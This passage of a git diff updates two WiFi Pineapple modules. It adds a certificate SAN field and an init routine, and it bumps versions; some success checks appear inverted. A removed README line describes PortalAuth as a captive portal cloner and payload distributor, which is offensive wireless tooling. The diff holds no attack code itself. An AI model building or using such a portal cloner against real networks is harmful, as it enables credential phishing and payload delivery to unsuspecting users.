params['days'] = $scope.certDaysValid;
|
||||
}
|
||||
if ($scope.certSANs != '') {
|
||||
params['sans'] = $scope.certSANs;
|
||||
}
|
||||
if ($scope.certEncryptKeysBool === true) {
|
||||
params['encrypt'] = "";
|
||||
params['algo'] = $scope.certEncryptAlgo;
|
||||
|
@ -168,6 +172,7 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
$scope.certDaysValid = "365";
|
||||
$scope.certBitSize = "2048";
|
||||
$scope.certSigAlgo = "sha256";
|
||||
$scope.certSANs = "";
|
||||
$scope.certKeyName = "";
|
||||
$scope.certInfoCountry = "";
|
||||
$scope.certInfoState = "";
|
||||
|
@ -251,7 +256,7 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
params: {cert,type}
|
||||
},function(response) {
|
||||
$scope.showCertThrobber = false;
|
||||
if (response.success === true) {
|
||||
if (response.error === "HTTP Error") {
|
||||
// Redirect if key type is TLS/SSL
|
||||
if (type == "TLS/SSL") {
|
||||
$scope.redirect("https");
|
||||
|
@ -297,7 +302,7 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
$scope.showRemoveSSLButton = true;
|
||||
$scope.refresh();
|
||||
|
||||
if (response.success === true) {
|
||||
if (response.error === "HTTP Error") {
|
||||
$scope.redirect("http");
|
||||
} else {
|
||||
}
|
||||
|
@ -399,7 +404,7 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
$http.post("/modules/Papers/api/module.php", fd, {
|
||||
transformRequest: angular.identity,
|
||||
headers: {'Content-Type': undefined}
|
||||
}).success(function(response) {
|
||||
}).then(function(response) {
|
||||
for (var key in response) {
|
||||
if (response.hasOwnProperty(key)) {
|
||||
if (response.key == "Failed") {
|
||||
|
@ -413,7 +418,23 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
});
|
||||
});
|
||||
|
||||
$scope.init = (function(){
|
||||
$api.request({
|
||||
module: 'Papers',
|
||||
action: 'init'
|
||||
},function(response){
|
||||
if (response.success == false) {
|
||||
if (response.message != '') {
|
||||
$scope.getLogs();
|
||||
} else {
|
||||
alert(response.message);
|
||||
}
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
// Init
|
||||
$scope.init();
|
||||
$scope.checkDepends();
|
||||
$scope.refresh();
|
||||
}])
|
||||
|
|
|
@ -209,43 +209,50 @@ $(document).on('mouseenter', '.papers_hoverDanger', function() {
|
|||
</div>
|
||||
</div>
|
||||
<hr ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'" />
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">Subject Alternative Names</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certSANs" placeholder="*.companyA.com, site1.companyB.com">
|
||||
</div>
|
||||
</div>
|
||||
<hr ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'" />
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<div class="col-md-8">
|
||||
<label>Modify Certificate Info <input type="checkbox" ng-model="modifyCertInfo"></label>
|
||||
</div>
|
||||
</div>
|
||||
<div class="panel-body" ng-show="modifyCertInfo" ng-hide="!modifyCertInfo">
|
||||
<div class="form-group">
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">Country</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certInfoCountry">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">State/Province</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certInfoState">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">Locality</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certInfoLocality">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">Organization</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certInfoOrganization">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">Section</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certInfoSection">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<div class="form-group" ng-show="certKeyType=='tls_ssl'" ng-hide="certKeyType=='ssh'">
|
||||
<label class="col-md-2 control-label">Common Name</label>
|
||||
<div class="col-md-6">
|
||||
<input type="text" class="form-control" ng-model="certInfoCN">
|
||||
|
|
|
@ -6,5 +6,5 @@
|
|||
"tetra"
|
||||
],
|
||||
"title": "Papers",
|
||||
"version": "1.4"
|
||||
"version": "1.5"
|
||||
}
|
|
@ -1,2 +0,0 @@
|
|||
# PortalAuth
|
||||
Captive portal cloner and payload distributor for the WiFi Pineapple NANO and TETRA
|
|
@ -94,6 +94,9 @@ class PortalAuth extends Module
|
|||
{
|
||||
public function route() {
|
||||
switch($this->request->action) {
|
||||
case 'init':
|
||||
$this->init();
|
||||
break;
|
||||
case 'depends':
|
||||
$this->depends($this->request->params);
|
||||
break;
|
||||
|
@ -224,6 +227,19 @@ class PortalAuth extends Module
|
|||
}
|
||||
}
|
||||
|
||||
/* ============================ */
|
||||
/* INIT FUNCTIONS */
|
||||
/* ============================ */
|
||||
|
||||
private function init() {
|
||||
if (!file_exists(__LOGS__)) {
|
||||
if (!mkdir(__LOGS__, 0755, true)) {
|
||||
$this->respond(false, "Failed to create logs directory");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//============================//
|
||||
// DEPENDENCY FUNCTIONS //
|
||||
//============================//
|
||||
|
|
|
@ -640,7 +640,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
|
|||
$http.post("/modules/PortalAuth/api/module.php", fd, {
|
||||
transformRequest: angular.identity,
|
||||
headers: {'Content-Type': undefined}
|
||||
}).success(function(response) {
|
||||
}).then(function(response) {
|
||||
for (var key in response) {
|
||||
if (response.hasOwnProperty(key)) {
|
||||
if (response.key == "Failed") {
|
||||
|
@ -717,7 +717,24 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
|
|||
$scope.stop = undefined;
|
||||
});
|
||||
|
||||
// Init
|
||||
$scope.init = (function(){
|
||||
$api.request({
|
||||
module: 'PortalAuth',
|
||||
action: 'init'
|
||||
},function(response){
|
||||
if (response.success == false) {
|
||||
if (response.message != '') {
|
||||
$scope.getLogs();
|
||||
} else {
|
||||
alert(response.message);
|
||||
}
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
// Init functions
|
||||
$scope.init();
|
||||
$scope.depends("-check");
|
||||
$scope.isOnline();
|
||||
$scope.checkTestServerConfig();
|
||||
|
|
|
@ -6,5 +6,5 @@
|
|||
"tetra"
|
||||
],
|
||||
"title": "Portal Auth",
|
||||
"version": "1.4"
|
||||
"version": "1.5"
|
||||
}
|
Loading…
Reference in New Issue